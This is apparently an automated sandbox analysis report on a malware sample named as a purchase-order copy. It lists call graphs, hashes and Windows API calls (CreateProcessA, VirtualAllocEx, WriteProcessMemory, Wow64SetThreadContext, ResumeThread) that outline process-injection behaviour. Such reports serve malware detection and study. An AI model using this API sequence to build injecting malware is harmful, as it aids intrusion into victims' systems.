25216->25217 25219 76e85e8 ResumeThread 25217->25219 25220 76e85e0 ResumeThread 25217->25220 25218 76eb4a5 25219->25218 25220->25218 25222 76eaa98 25221->25222 25224 76eb623 25222->25224 25228 76e8ee5 CreateProcessA 25222->25228 25229 76e8ef0 CreateProcessA 25222->25229 25223 76eab2f 25225 76eab69 25223->25225 25226 76e8d58 ReadProcessMemory 25223->25226 25227 76e8d50 ReadProcessMemory 25223->25227 25224->25117 25225->25117 25226->25223 25227->25223 25228->25223 25229->25223 25231 76eaed2 25230->25231 25233 76e8c68 WriteProcessMemory 25231->25233 25234 76e8c60 WriteProcessMemory 25231->25234 25232 76eb4fc 25232->25117 25233->25232 25234->25232 25236 76e8da3 ReadProcessMemory 25235->25236 25238 76e8de7 25236->25238 25238->25137 25240 76e8da3 ReadProcessMemory 25239->25240 25242 76e8de7 25240->25242 25242->25137 25244 76e8cb0 WriteProcessMemory 25243->25244 25246 76e8d07 25244->25246 25246->25147 25248 76e8c3a 25247->25248 25249 76e8c66 WriteProcessMemory 25247->25249 25248->25147 25251 76e8d07 25249->25251 25251->25147 25253 76eb795 25252->25253 25262 76e8ac9 25253->25262 25266 76e8ad0 25253->25266 25254 76eb7ab 25254->25157 25258 76eb795 25257->25258 25260 76e8ac9 Wow64SetThreadContext 25258->25260 25261 76e8ad0 Wow64SetThreadContext 25258->25261 25259 76eb7ab 25259->25157 25260->25259 25261->25259 25263 76e8b15 Wow64SetThreadContext 25262->25263 25265 76e8b5d 25263->25265 25265->25254 25267 76e8b15 Wow64SetThreadContext 25266->25267 25269 76e8b5d 25267->25269 25269->25254 25271 76e8ba8 VirtualAllocEx 25270->25271 25273 76e8c25 25271->25273 25273->25166 25275 76e8be8 VirtualAllocEx 25274->25275 25277 76e8c25 25275->25277 25277->25166 25279 76e8628 ResumeThread 25278->25279 25281 76e8659 25279->25281 25281->25171 25283 76e8628 ResumeThread 25282->25283 25285 76e8659 25283->25285 25285->25171 25287 76e8f79 CreateProcessA 25286->25287 25289 76e913b 25287->25289 25291 76e8f79 CreateProcessA 25290->25291 25293 76e913b 25291->25293 25295 76eb9a5 25294->25295 25297 76e8ac9 Wow64SetThreadContext 25295->25297 25298 76e8ad0 Wow64SetThreadContext 25295->25298 25296 76eb9bb 25296->25193 25297->25296 25298->25296 25300 76eb9a5 25299->25300 25302 76e8ac9 Wow64SetThreadContext 25300->25302 25303 76e8ad0 Wow64SetThreadContext 25300->25303 25301 76eb9bb 25301->25193 25302->25301 25303->25301 25304 16bd440 25305 16bd486 GetCurrentProcess 25304->25305 25307 16bd4d8 GetCurrentThread 25305->25307 25308 16bd4d1 25305->25308 25309 16bd50e 25307->25309 25310 16bd515 GetCurrentProcess 25307->25310 25308->25307 25309->25310 25311 16bd54b 25310->25311 25312 16bd573 GetCurrentThreadId 25311->25312 25313 16bd5a4 25312->25313 25321 16b4a30 25322 16b4a39 25321->25322 25323 16b4a3f 25322->25323 25325 16b4b29 25322->25325 25326 16b4b4d 25325->25326 25330 16b4c29 25326->25330 25334 16b4c38 25326->25334 25332 16b4c38 25330->25332 25331 16b4d3c 25331->25331 25332->25331 25338 16b4814 25332->25338 25335 16b4c5f 25334->25335 25336 16b4d3c 25335->25336 25337 16b4814 CreateActCtxA 25335->25337 25337->25336 25339 16b5cc8 CreateActCtxA 25338->25339 25341 16b5d8b 25339->25341 25341->25341 25342 16bb0b0 25346 16bb199 25342->25346 25354 16bb1a8 25342->25354 25343 16bb0bf 25347 16bb1b9 25346->25347 25348 16bb1dc 25346->25348 25347->25348 25362 16bb431 25347->25362 25366 16bb440 25347->25366 25348->25343 25349 16bb1d4 25349->25348 25350 16bb3e0 GetModuleHandleW 25349->25350 25351 16bb40d 25350->25351 25351->25343 25355 16bb1b9 25354->25355 25356 16bb1dc 25354->25356 25355->25356 25360 16bb431 LoadLibraryExW 25355->25360 25361 16bb440 LoadLibraryExW 25355->25361 25356->25343 25357 16bb1d4 25357->25356 25358 16bb3e0 GetModuleHandleW 25357->25358 25359 16bb40d 25358->25359 25359->25343 25360->25357 25361->25357 25363 16bb454 25362->25363 25364 16bb479 25363->25364 25370 16babb0 25363->25370 25364->25349 25367 16bb454 25366->25367 25368 16babb0 LoadLibraryExW 25367->25368 25369 16bb479 25367->25369 25368->25369 25369->25349 25371 16bb620 LoadLibraryExW 25370->25371 25373 16bb699 25371->25373 25373->25364

                            Executed Functions

                            Function 076EAA76 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ca7f14b0254efbad42020485dac453a29d71eaa65958b5427799c9d22e1bf58
                            • Instruction ID: 7eef006200917898fcc583409a34cb274ee1d4dad9a06bd6f1b9f8656abaad9c
                            • Opcode Fuzzy Hash: 0ca7f14b0254efbad42020485dac453a29d71eaa65958b5427799c9d22e1bf58
                            • Instruction Fuzzy Hash: BF2151B490A258CFDB64CF54C984BE8BBB9EF06300F1094DAD44AAB281C7715AC5CF10
                            Function 076E3330 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fcc917dc10cb27196b30d35cb7f6aab0e591cc7160346960deac39544905308d
                            • Instruction ID: 240dd045324bfde1eeec197ed273a8db4e012913f375ee5541dda1ef04e058ae
                            • Opcode Fuzzy Hash: fcc917dc10cb27196b30d35cb7f6aab0e591cc7160346960deac39544905308d
                            • Instruction Fuzzy Hash: 09211AB0D156199BEB18CF97C9543EEFBFAAF89300F14C06AD40AB72A4DB7409458F60
                            Function 016BD430 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 294 16bd430-16bd4cf GetCurrentProcess 299 16bd4d8-16bd50c GetCurrentThread 294->299 300 16bd4d1-16bd4d7 294->300 301 16bd50e-16bd514 299->301 302 16bd515-16bd549 GetCurrentProcess 299->302 300->299 301->302 303 16bd54b-16bd551 302->303 304 16bd552-16bd56d call 16bd60f 302->304 303->304 308 16bd573-16bd5a2 GetCurrentThreadId 304->308 309 16bd5ab-16bd60d 308->309 310 16bd5a4-16bd5aa 308->310 310->309
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 016BD4BE
                            • GetCurrentThread.KERNEL32 ref: 016BD4FB
                            • GetCurrentProcess.KERNEL32 ref: 016BD538
                            • GetCurrentThreadId.KERNEL32 ref: 016BD591
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: 70b3c1bf8be3c3f01d858587f73bcf85e3bbf4d1329e5a8f562e9ac65d464f68
                            • Instruction ID: f56c02523a1b755df1ab1b1cd74469757994d66e3bed31935f3838ed8380263b
                            • Opcode Fuzzy Hash: 70b3c1bf8be3c3f01d858587f73bcf85e3bbf4d1329e5a8f562e9ac65d464f68
                            • Instruction Fuzzy Hash: 625179B09013498FDB18DFA9D948BDEBFF5EF48304F208459D109A7360D7389984CB65
                            Function 016BD440 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 317 16bd440-16bd4cf GetCurrentProcess 321 16bd4d8-16bd50c GetCurrentThread 317->321 322 16bd4d1-16bd4d7 317->322 323 16bd50e-16bd514 321->323 324 16bd515-16bd549 GetCurrentProcess 321->324 322->321 323->324 325 16bd54b-16bd551 324->325 326 16bd552-16bd56d call 16bd60f 324->326 325->326 330 16bd573-16bd5a2 GetCurrentThreadId 326->330 331 16bd5ab-16bd60d 330->331 332 16bd5a4-16bd5aa 330->332 332->331
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 016BD4BE
                            • GetCurrentThread.KERNEL32 ref: 016BD4FB
                            • GetCurrentProcess.KERNEL32 ref: 016BD538
                            • GetCurrentThreadId.KERNEL32 ref: 016BD591
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Current$ProcessThread
                            • String ID:
                            • API String ID: 2063062207-0
                            • Opcode ID: a6022138700a5cac9b1b16ff1896d4969329b3382ecb9b8c35b6822257b1d124
                            • Instruction ID: 7f2a9a1c2ce2695bba0e67e68931417c8bf703d434ac9955bdee99297b4e8b24
                            • Opcode Fuzzy Hash: a6022138700a5cac9b1b16ff1896d4969329b3382ecb9b8c35b6822257b1d124
                            • Instruction Fuzzy Hash: FD5169B09002498FDB18DFAAD948BDEBBF5FF48318F208459D119A7360D738A984CF65
                            Function 076E8EE5 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 490 76e8ee5-76e8f85 492 76e8fbe-76e8fde 490->492 493 76e8f87-76e8f91 490->493 500 76e9017-76e9046 492->500 501 76e8fe0-76e8fea 492->501 493->492 494 76e8f93-76e8f95 493->494 495 76e8fb8-76e8fbb 494->495 496 76e8f97-76e8fa1 494->496 495->492 498 76e8fa5-76e8fb4 496->498 499 76e8fa3 496->499 498->498 502 76e8fb6 498->502 499->498 509 76e907f-76e9139 CreateProcessA 500->509 510 76e9048-76e9052 500->510 501->500 503 76e8fec-76e8fee 501->503 502->495 505 76e8ff0-76e8ffa 503->505 506 76e9011-76e9014 503->506 507 76e8ffe-76e900d 505->507 508 76e8ffc 505->508 506->500 507->507 511 76e900f 507->511 508->507 521 76e913b-76e9141 509->521 522 76e9142-76e91c8 509->522 510->509 512 76e9054-76e9056 510->512 511->506 514 76e9058-76e9062 512->514 515 76e9079-76e907c 512->515 516 76e9066-76e9075 514->516 517 76e9064 514->517 515->509 516->516 519 76e9077 516->519 517->516 519->515 521->522 532 76e91ca-76e91ce 522->532 533 76e91d8-76e91dc 522->533 532->533 534 76e91d0 532->534 535 76e91de-76e91e2 533->535 536 76e91ec-76e91f0 533->536 534->533 535->536 539 76e91e4 535->539 537 76e91f2-76e91f6 536->537 538 76e9200-76e9204 536->538 537->538 540 76e91f8 537->540 541 76e9216-76e921d 538->541 542 76e9206-76e920c 538->542 539->536 540->538 543 76e921f-76e922e 541->543 544 76e9234 541->544 542->541 543->544 546 76e9235 544->546 546->546
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076E9126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: eae0c0aeb13e63d523ac91549133e1b11e6629d014d80bf9c439a41b35829beb
                            • Instruction ID: d1f2969879726ec078c2fe2193fdb191b807a02c06bb9eee5d79a1c0de276e7f
                            • Opcode Fuzzy Hash: eae0c0aeb13e63d523ac91549133e1b11e6629d014d80bf9c439a41b35829beb
                            • Instruction Fuzzy Hash: 88A15BB1D0131ACFDB15DF68C8407DDBBB6BF48314F14816AD80AA7250D774A985CFA2
                            Function 076E8EF0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 547 76e8ef0-76e8f85 549 76e8fbe-76e8fde 547->549 550 76e8f87-76e8f91 547->550 557 76e9017-76e9046 549->557 558 76e8fe0-76e8fea 549->558 550->549 551 76e8f93-76e8f95 550->551 552 76e8fb8-76e8fbb 551->552 553 76e8f97-76e8fa1 551->553 552->549 555 76e8fa5-76e8fb4 553->555 556 76e8fa3 553->556 555->555 559 76e8fb6 555->559 556->555 566 76e907f-76e9139 CreateProcessA 557->566 567 76e9048-76e9052 557->567 558->557 560 76e8fec-76e8fee 558->560 559->552 562 76e8ff0-76e8ffa 560->562 563 76e9011-76e9014 560->563 564 76e8ffe-76e900d 562->564 565 76e8ffc 562->565 563->557 564->564 568 76e900f 564->568 565->564 578 76e913b-76e9141 566->578 579 76e9142-76e91c8 566->579 567->566 569 76e9054-76e9056 567->569 568->563 571 76e9058-76e9062 569->571 572 76e9079-76e907c 569->572 573 76e9066-76e9075 571->573 574 76e9064 571->574 572->566 573->573 576 76e9077 573->576 574->573 576->572 578->579 589 76e91ca-76e91ce 579->589 590 76e91d8-76e91dc 579->590 589->590 591 76e91d0 589->591 592 76e91de-76e91e2 590->592 593 76e91ec-76e91f0 590->593 591->590 592->593 596 76e91e4 592->596 594 76e91f2-76e91f6 593->594 595 76e9200-76e9204 593->595 594->595 597 76e91f8 594->597 598 76e9216-76e921d 595->598 599 76e9206-76e920c 595->599 596->593 597->595 600 76e921f-76e922e 598->600 601 76e9234 598->601 599->598 600->601 603 76e9235 601->603 603->603
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076E9126
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 53aed6a633d14254e50630af5bf2ebaacf725d5effca38e634bf4785aca21a58
                            • Instruction ID: ab0bc1cf74f357c53e9e8ce90f2c40c442c884edb5366fc37963a5566a62288d
                            • Opcode Fuzzy Hash: 53aed6a633d14254e50630af5bf2ebaacf725d5effca38e634bf4785aca21a58
                            • Instruction Fuzzy Hash: 40914BB1D0131ACFDB15DF69C8407DDBBB6BF48314F1481A9D80AA7250DB74A985CFA2
                            Function 016BB1A8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 604 16bb1a8-16bb1b7 605 16bb1b9-16bb1c6 call 16bab4c 604->605 606 16bb1e3-16bb1e7 604->606 613 16bb1c8 605->613 614 16bb1dc 605->614 607 16bb1fb-16bb23c 606->607 608 16bb1e9-16bb1f3 606->608 615 16bb249-16bb257 607->615 616 16bb23e-16bb246 607->616 608->607 664 16bb1ce call 16bb431 613->664 665 16bb1ce call 16bb440 613->665 614->606 618 16bb27b-16bb27d 615->618 619 16bb259-16bb25e 615->619 616->615 617 16bb1d4-16bb1d6 617->614 620 16bb318-16bb394 617->620 621 16bb280-16bb287 618->621 622 16bb269 619->622 623 16bb260-16bb267 call 16bab58 619->623 654 16bb3c0-16bb3d8 620->654 655 16bb396-16bb3be 620->655 625 16bb289-16bb291 621->625 626 16bb294-16bb29b 621->626 624 16bb26b-16bb279 622->624 623->624 624->621 625->626 628 16bb2a8-16bb2b1 call 16bab68 626->628 629 16bb29d-16bb2a5 626->629 635 16bb2be-16bb2c3 628->635 636 16bb2b3-16bb2bb 628->636 629->628 637 16bb2e1-16bb2e5 635->637 638 16bb2c5-16bb2cc 635->638 636->635 662 16bb2e8 call 16bb740 637->662 663 16bb2e8 call 16bb710 637->663 638->637 640 16bb2ce-16bb2de call 16bab78 call 16bab88 638->640 640->637 641 16bb2eb-16bb2ee 644 16bb311-16bb317 641->644 645 16bb2f0-16bb30e 641->645 645->644 657 16bb3da-16bb3dd 654->657 658 16bb3e0-16bb40b GetModuleHandleW 654->658 655->654 657->658 659 16bb40d-16bb413 658->659 660 16bb414-16bb428 658->660 659->660 662->641 663->641 664->617 665->617
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB3FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 43b38a136da1252be524f78dc57ca5fe06e1d7e260befe34b883409292f03075
                            • Instruction ID: 92ba99a0df90a2e2cfd32bb2dbea2d7ddaad4a692ae80069366d8e26ad7a2266
                            • Opcode Fuzzy Hash: 43b38a136da1252be524f78dc57ca5fe06e1d7e260befe34b883409292f03075
                            • Instruction Fuzzy Hash: A9815770A00B458FD724DF6AD8847AABBF1FF48304F00892ED58697B51D774E986CB94
                            Function 016B5CBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 666 16b5cbc-16b5d89 CreateActCtxA 668 16b5d8b-16b5d91 666->668 669 16b5d92-16b5dec 666->669 668->669 676 16b5dfb-16b5dff 669->676 677 16b5dee-16b5df1 669->677 678 16b5e01-16b5e0d 676->678 679 16b5e10 676->679 677->676 678->679 680 16b5e11 679->680 680->680
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 016B5D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 71026a0192272bf59f210a6abd40cc89d47638da1e153c63b9850acda6734971
                            • Instruction ID: 52782450b5bd640de3142617182849f3051325e524eba78a6c975dbb2b7ba50c
                            • Opcode Fuzzy Hash: 71026a0192272bf59f210a6abd40cc89d47638da1e153c63b9850acda6734971
                            • Instruction Fuzzy Hash: B14112B1C00719CFDB24DFA9C888BCDBBB1BF48304F20815AD409AB255DB756986CF90
                            Function 016B4814 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 682 16b4814-16b5d89 CreateActCtxA 685 16b5d8b-16b5d91 682->685 686 16b5d92-16b5dec 682->686 685->686 693 16b5dfb-16b5dff 686->693 694 16b5dee-16b5df1 686->694 695 16b5e01-16b5e0d 693->695 696 16b5e10 693->696 694->693 695->696 697 16b5e11 696->697 697->697
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 016B5D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: b1f9e9681e4bc78393f320f7426ef9e306c011b05e35873719fbd92ba9f48f7a
                            • Instruction ID: a20a87454515c7dd542a217dafcf509bc7e8814270905cce35c93513cef6b02d
                            • Opcode Fuzzy Hash: b1f9e9681e4bc78393f320f7426ef9e306c011b05e35873719fbd92ba9f48f7a
                            • Instruction Fuzzy Hash: 2B41E3B1C0071DCBDB24DFA9C988BDEBBB5BF48304F20815AD409AB255DB756946CF90
                            Function 076E8C60 Relevance: 1.6, APIs: 1, Instructions: 82injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 699 76e8c60-76e8c64 700 76e8c3a-76e8c51 699->700 701 76e8c66-76e8cb6 699->701 703 76e8cb8-76e8cc4 701->703 704 76e8cc6-76e8d05 WriteProcessMemory 701->704 703->704 707 76e8d0e-76e8d3e 704->707 708 76e8d07-76e8d0d 704->708 708->707
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076E8CF8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 2e46db1964ca64111310f201efe08ea7264e9cc724e45cb357031db1db2fd131
                            • Instruction ID: 76b276e336e8a7e435c94a1b30ac2613b0593c66d4086922ab2923799e62af54
                            • Opcode Fuzzy Hash: 2e46db1964ca64111310f201efe08ea7264e9cc724e45cb357031db1db2fd131
                            • Instruction Fuzzy Hash: 53314BB69013098FCB10CFA9D941ADEFBF5FF48310F10842AE959A7250C7749955CFA0
                            Function 076E8C68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 712 76e8c68-76e8cb6 714 76e8cb8-76e8cc4 712->714 715 76e8cc6-76e8d05 WriteProcessMemory 712->715 714->715 717 76e8d0e-76e8d3e 715->717 718 76e8d07-76e8d0d 715->718 718->717
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076E8CF8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 75755af30a9fa2680e020df70d2abbb42dc59406a5b66902fb60c1b8f3cc2ad1
                            • Instruction ID: 54aa5a3fe104ad64fbc21ae677c5d9160e3d9071b15ff5fa57ef5cfd7ed043dc
                            • Opcode Fuzzy Hash: 75755af30a9fa2680e020df70d2abbb42dc59406a5b66902fb60c1b8f3cc2ad1
                            • Instruction Fuzzy Hash: FD2155B59013499FDB10DFAAC884BEEBBF5FF48310F10842AE919A7240C7789944CFA0
                            Function 076E8D50 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 722 76e8d50-76e8de5 ReadProcessMemory 725 76e8dee-76e8e1e 722->725 726 76e8de7-76e8ded 722->726 726->725
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076E8DD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 9086ec41e3ccef1bddfb9e272d2d3ad0118f09588f29d45734ba754886bae5c3
                            • Instruction ID: 2ed95c6578c2b386439b7d9d89512dd5ee359070726fa9fc906927c05318238f
                            • Opcode Fuzzy Hash: 9086ec41e3ccef1bddfb9e272d2d3ad0118f09588f29d45734ba754886bae5c3
                            • Instruction Fuzzy Hash: 1A2116B5C002599FDB10DFA9C985AEEFBF5FF48310F10882AE519A7250C7389545DFA1
                            Function 016BD681 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD70F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 828b7371b49310675da742f76e14779fed4e26b4c8cfd72518a51cc9c2fcbc77
                            • Instruction ID: 98528b09162e42c503d8bd5334a099f66a594dd13975a3c320931045223caea8
                            • Opcode Fuzzy Hash: 828b7371b49310675da742f76e14779fed4e26b4c8cfd72518a51cc9c2fcbc77
                            • Instruction Fuzzy Hash: E621E6B59002589FDB10CF9AD984AEEFFF5FB48314F14801AE954A7350D378A944CFA5
                            Function 076E8AC9 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076E8B4E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 1c60fe77826469cdf1b8b38054fac7bbec2007651dee6f9c299406e5a5124a41
                            • Instruction ID: e02b9571631e76f53df48834fd07d4795f6a5d8379d00dc02e2e487b2de2cc4a
                            • Opcode Fuzzy Hash: 1c60fe77826469cdf1b8b38054fac7bbec2007651dee6f9c299406e5a5124a41
                            • Instruction Fuzzy Hash: 392114B590020A8EDB10DFA9C5857EEFBF4AF48214F10842AD559A7240CB789A45CBA0
                            Function 076E8D58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076E8DD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: d1bf753fd23507abd2b50334fc92b20826d2bcc849234e9bab03097c1996927f
                            • Instruction ID: ca12d69f8ed3bb684c82c3ad5f0ebdaec7b23e03ebf4740f3d7e29ec2d132de5
                            • Opcode Fuzzy Hash: d1bf753fd23507abd2b50334fc92b20826d2bcc849234e9bab03097c1996927f
                            • Instruction Fuzzy Hash: A22116B18002599FCB10DFAAC844AEEFBF5FF48310F108429E519A7250C7389545CBA1
                            Function 076E8AD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076E8B4E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: f6731cf7ee22988b19d0256207f439706ecdfe3373b87553a313512aa08b4952
                            • Instruction ID: afe746817ce3a3c14943f0e8d8f1e7fa239f0ef47eab099f2f507a67803b29bb
                            • Opcode Fuzzy Hash: f6731cf7ee22988b19d0256207f439706ecdfe3373b87553a313512aa08b4952
                            • Instruction Fuzzy Hash: 862115B1D003098FDB10DFAAC485BEEBBF9EF48314F14842AD559A7240CB78A945CFA5
                            Function 016BD688 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD70F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1984416466.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16b0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: a354bdeb48b6e0aa2066d8263f49eee5abf9c15a901aacccd7b060c90568a9e9
                            • Instruction ID: 8bfb48e7733d5bf1e7ab545170cd1d01832200b5b0965ae9c47d6f7005e2638a
                            • Opcode Fuzzy Hash: a354bdeb48b6e0aa2066d8263f49eee5abf9c15a901aacccd7b060c90568a9e9
                            • Instruction Fuzzy Hash: A821E4B59002489FDB10CF9AD984AEEFFF8FB48314F14801AE918A7310D378A944CFA5
                            Function 076E8BA0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076E8C16
                            Memory Dump Source
                            • Source File: 00000000.00000002.2001732445.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_76e0000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: AllocVirtual
